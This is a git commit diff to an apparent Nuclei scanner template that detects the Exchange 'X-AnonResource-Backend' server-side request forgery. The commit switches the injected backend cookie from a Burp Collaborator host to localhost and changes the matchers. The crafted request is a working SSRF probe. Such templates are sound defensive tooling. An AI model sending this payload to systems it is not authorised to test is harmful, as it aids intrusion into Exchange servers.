No need for internet connection and leak to burp

patch-1
aron 2021-03-08 08:55:22 +01:00
parent 0d75d24bd9
commit 0c761a2e85
1 changed files with 3 additions and 3 deletions

View File

@ -19,7 +19,7 @@ requests:
GET /owa/auth/x.js HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
Accept-Language: en
Connection: close
@ -27,8 +27,8 @@ requests:
matchers:
- type: status
status:
- 200
- 500
- type: word
words:
- "Burp Collaborator Server"
- "localhost"
part: body